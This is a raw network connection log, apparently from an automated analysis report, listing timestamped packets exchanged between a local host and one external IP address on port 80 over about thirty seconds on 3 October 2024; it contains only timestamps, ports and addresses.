                                                          Oct 3, 2024 09:21:10.867894888 CEST804972745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:10.868266106 CEST4972780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:10.868568897 CEST4972780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:10.873454094 CEST804972745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:11.025348902 CEST4972880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:11.030342102 CEST804972845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:11.030885935 CEST4972880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:11.033385038 CEST4972880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:11.038311005 CEST804972845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:11.038525105 CEST4972880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:11.043416977 CEST804972845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:11.917903900 CEST804972845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:11.917917967 CEST804972845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:11.917932034 CEST804972845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:11.918015957 CEST4972880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:11.918035984 CEST4972880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:11.918035984 CEST4972880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:11.922868967 CEST804972845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:12.085623980 CEST4972980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:12.090502024 CEST804972945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:12.090635061 CEST4972980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:12.092761993 CEST4972980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:12.097568035 CEST804972945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:12.097651005 CEST4972980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:12.102543116 CEST804972945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:12.878017902 CEST804972945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:12.878045082 CEST804972945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:12.878143072 CEST4972980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:12.878180981 CEST4972980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:12.883774042 CEST804972945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:13.030831099 CEST4973080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:13.039484024 CEST804973045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:13.039613008 CEST4973080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:13.045036077 CEST4973080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:13.053859949 CEST804973045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:13.053982019 CEST4973080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:13.062566996 CEST804973045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:13.804303885 CEST804973045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:13.804342985 CEST804973045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:13.804474115 CEST4973080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:13.804706097 CEST4973080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:13.809510946 CEST804973045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:13.947474003 CEST4973180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:13.952402115 CEST804973145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:13.952488899 CEST4973180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:13.958497047 CEST4973180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:13.963305950 CEST804973145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:13.963378906 CEST4973180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:13.969389915 CEST804973145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:14.643101931 CEST804973145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:14.643141985 CEST804973145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:14.643309116 CEST4973180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:14.643347025 CEST4973180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:14.648261070 CEST804973145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:14.799489021 CEST4973280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:14.804363966 CEST804973245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:14.804868937 CEST4973280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:14.806760073 CEST4973280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:14.811575890 CEST804973245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:14.812196016 CEST4973280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:14.817014933 CEST804973245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:15.448180914 CEST804973245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:15.448209047 CEST804973245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:15.448370934 CEST4973280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:15.448370934 CEST4973280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:15.453200102 CEST804973245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:15.613046885 CEST4973380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:15.618139029 CEST804973345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:15.618410110 CEST4973380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:15.625766993 CEST4973380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:15.630875111 CEST804973345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:15.631001949 CEST4973380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:15.635907888 CEST804973345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:17.426115990 CEST804973345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:17.426331043 CEST804973345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:17.426362991 CEST4973380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:17.426408052 CEST4973380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:17.431251049 CEST804973345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:17.606376886 CEST4973480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:17.611447096 CEST804973445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:17.611574888 CEST4973480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:17.613740921 CEST4973480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:17.618597984 CEST804973445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:17.618666887 CEST4973480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:17.623584032 CEST804973445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:18.676727057 CEST804973445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:18.676940918 CEST4973480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:18.682148933 CEST804973445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:18.682245970 CEST4973480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:18.836416006 CEST4973580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:18.841451883 CEST804973545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:18.841562033 CEST4973580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:18.843678951 CEST4973580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:18.848495960 CEST804973545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:18.848565102 CEST4973580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:18.853375912 CEST804973545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:19.691886902 CEST804973545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:19.691905022 CEST804973545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:19.692115068 CEST4973580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:19.692148924 CEST4973580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:19.692253113 CEST804973545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:19.692351103 CEST4973580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:19.697873116 CEST804973545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:20.060745001 CEST4973680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.065624952 CEST804973645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:20.065726042 CEST4973680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.067845106 CEST4973680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.073244095 CEST804973645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:20.073299885 CEST4973680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.383909941 CEST4973680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.434667110 CEST804973645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:20.434681892 CEST804973645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:20.718350887 CEST804973645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:20.718391895 CEST804973645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:20.718523026 CEST4973680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.718699932 CEST4973680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.723424911 CEST804973645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:20.882213116 CEST4973780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.887341022 CEST804973745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:20.887464046 CEST4973780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.889588118 CEST4973780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.894459009 CEST804973745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:20.894548893 CEST4973780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:20.899425983 CEST804973745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:21.526664019 CEST804973745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:21.526882887 CEST4973780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:21.527200937 CEST804973745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:21.527265072 CEST4973780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:21.531765938 CEST804973745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:21.692071915 CEST4973880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:21.696954966 CEST804973845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:21.697146893 CEST4973880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:21.704443932 CEST4973880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:21.709203005 CEST804973845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:21.709486008 CEST4973880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:21.714268923 CEST804973845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:22.447510004 CEST804973845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:22.447557926 CEST804973845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:22.447679043 CEST4973880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:22.450542927 CEST4973880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:22.455429077 CEST804973845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:22.719789028 CEST4973980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:22.724620104 CEST804973945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:22.724728107 CEST4973980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:22.726998091 CEST4973980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:22.731781960 CEST804973945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:22.731827021 CEST4973980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:22.736798048 CEST804973945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:23.391484976 CEST804973945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:23.391585112 CEST804973945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:23.391638994 CEST4973980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:23.391669989 CEST4973980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:23.396516085 CEST804973945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:23.528836966 CEST4974080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:23.533726931 CEST804974045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:23.533987045 CEST4974080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:23.536640882 CEST4974080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:23.541420937 CEST804974045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:23.541526079 CEST4974080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:23.546449900 CEST804974045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:24.274101019 CEST804974045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:24.274195910 CEST4974080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:24.274529934 CEST804974045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:24.274643898 CEST4974080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:24.279090881 CEST804974045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:24.417665005 CEST4974180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:24.422554016 CEST804974145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:24.422657967 CEST4974180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:24.424740076 CEST4974180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:24.429620028 CEST804974145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:24.429750919 CEST4974180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:24.434624910 CEST804974145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:25.101639986 CEST804974145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:25.101747036 CEST804974145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:25.101835966 CEST4974180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:25.101871014 CEST4974180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:25.106678009 CEST804974145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:25.244787931 CEST4974280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:25.249562025 CEST804974245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:25.249680996 CEST4974280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:25.251813889 CEST4974280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:25.256619930 CEST804974245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:25.256730080 CEST4974280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:25.261534929 CEST804974245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:25.961544037 CEST804974245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:25.961718082 CEST804974245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:25.961812019 CEST4974280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:25.961847067 CEST4974280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:25.966661930 CEST804974245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:26.106340885 CEST4974380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:26.111435890 CEST804974345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:26.111630917 CEST4974380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:26.113770008 CEST4974380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:26.118642092 CEST804974345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:26.118736029 CEST4974380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:26.123558044 CEST804974345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:26.738610029 CEST804974345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:26.738686085 CEST804974345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:26.738758087 CEST4974380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:26.738758087 CEST4974380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:26.743539095 CEST804974345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:26.885689020 CEST4974480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:26.890511990 CEST804974445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:26.890625000 CEST4974480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:26.892745018 CEST4974480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:26.897604942 CEST804974445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:26.897708893 CEST4974480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:26.902581930 CEST804974445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:27.713023901 CEST804974445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:27.713196993 CEST804974445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:27.713273048 CEST4974480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:27.713318110 CEST4974480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:27.718153000 CEST804974445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:27.860356092 CEST4974580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:27.865420103 CEST804974545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:27.865583897 CEST4974580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:27.867804050 CEST4974580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:27.872649908 CEST804974545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:27.873598099 CEST4974580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:27.878947020 CEST804974545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:28.560340881 CEST804974545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:28.560374975 CEST804974545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:28.560491085 CEST4974580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:28.560878038 CEST4974580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:28.565618038 CEST804974545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:28.699644089 CEST4974680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:28.704550982 CEST804974645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:28.705125093 CEST4974680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:28.706788063 CEST4974680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:28.711623907 CEST804974645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:28.712017059 CEST4974680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:28.717338085 CEST804974645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:29.491594076 CEST804974645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:29.491611958 CEST804974645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:29.491681099 CEST4974680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:29.491735935 CEST4974680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:29.496598959 CEST804974645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:29.642467022 CEST4974780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:29.647353888 CEST804974745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:29.647470951 CEST4974780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:29.649656057 CEST4974780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:29.654478073 CEST804974745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:29.654591084 CEST4974780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:29.659339905 CEST804974745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:30.421461105 CEST804974745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:30.421494961 CEST804974745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:30.421695948 CEST4974780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:30.421895981 CEST4974780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:30.428215981 CEST804974745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:30.573071003 CEST4974980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:30.579766989 CEST804974945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:30.579885960 CEST4974980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:30.586230993 CEST4974980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:30.592636108 CEST804974945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:30.592777014 CEST4974980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:30.599297047 CEST804974945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:31.421685934 CEST804974945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:31.421935081 CEST804974945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:31.421948910 CEST4974980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:31.421991110 CEST4974980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:31.426743984 CEST804974945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:31.571413040 CEST4975080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:32.555809021 CEST4975080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:32.593147039 CEST804975045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:32.593178988 CEST804975045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:32.593260050 CEST4975080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:32.593275070 CEST4975080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:32.595339060 CEST4975080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:32.603548050 CEST804975045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:32.603611946 CEST4975080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:32.608417988 CEST804975045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:33.372004032 CEST804975045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:33.372102022 CEST4975080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:33.372181892 CEST804975045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:33.372277021 CEST4975080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:33.376904964 CEST804975045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:33.513839960 CEST4975180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:33.518960953 CEST804975145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:33.519113064 CEST4975180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:33.521265984 CEST4975180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:33.526158094 CEST804975145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:33.526237965 CEST4975180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:33.531099081 CEST804975145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:35.070930958 CEST804975145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:35.070967913 CEST804975145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:35.071027994 CEST804975145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:35.071052074 CEST4975180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:35.071086884 CEST804975145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:35.071091890 CEST4975180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:35.071093082 CEST4975180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:35.071125031 CEST4975180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:35.071223974 CEST804975145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:35.071264982 CEST4975180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:35.076126099 CEST804975145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:35.213135958 CEST4975280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:35.218244076 CEST804975245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:35.218341112 CEST4975280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:35.220405102 CEST4975280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:35.225244999 CEST804975245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:35.225313902 CEST4975280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:35.230190992 CEST804975245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:36.956888914 CEST804975245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:36.957061052 CEST4975280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:36.962379932 CEST804975245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:36.962466955 CEST4975280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:37.108926058 CEST4975380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:37.114176989 CEST804975345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:37.114552975 CEST4975380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:37.116375923 CEST4975380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:37.121193886 CEST804975345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:37.121380091 CEST4975380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:37.126241922 CEST804975345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:42.165158033 CEST804975345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:42.165334940 CEST4975380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:42.170623064 CEST804975345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:42.170718908 CEST4975380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:42.305691004 CEST4975480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:42.310564995 CEST804975445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:42.310678959 CEST4975480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:42.312860966 CEST4975480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:42.317672014 CEST804975445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:42.317760944 CEST4975480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:42.322609901 CEST804975445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:43.028489113 CEST804975445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:43.028520107 CEST804975445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:43.028732061 CEST4975480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:43.028825998 CEST4975480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:43.033643961 CEST804975445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:43.170352936 CEST4975580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:43.175287962 CEST804975545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:43.175405979 CEST4975580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:43.177519083 CEST4975580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:43.182331085 CEST804975545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:43.182437897 CEST4975580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:43.187231064 CEST804975545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:43.857722044 CEST804975545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:43.857741117 CEST804975545.149.241.169192.168.2.10
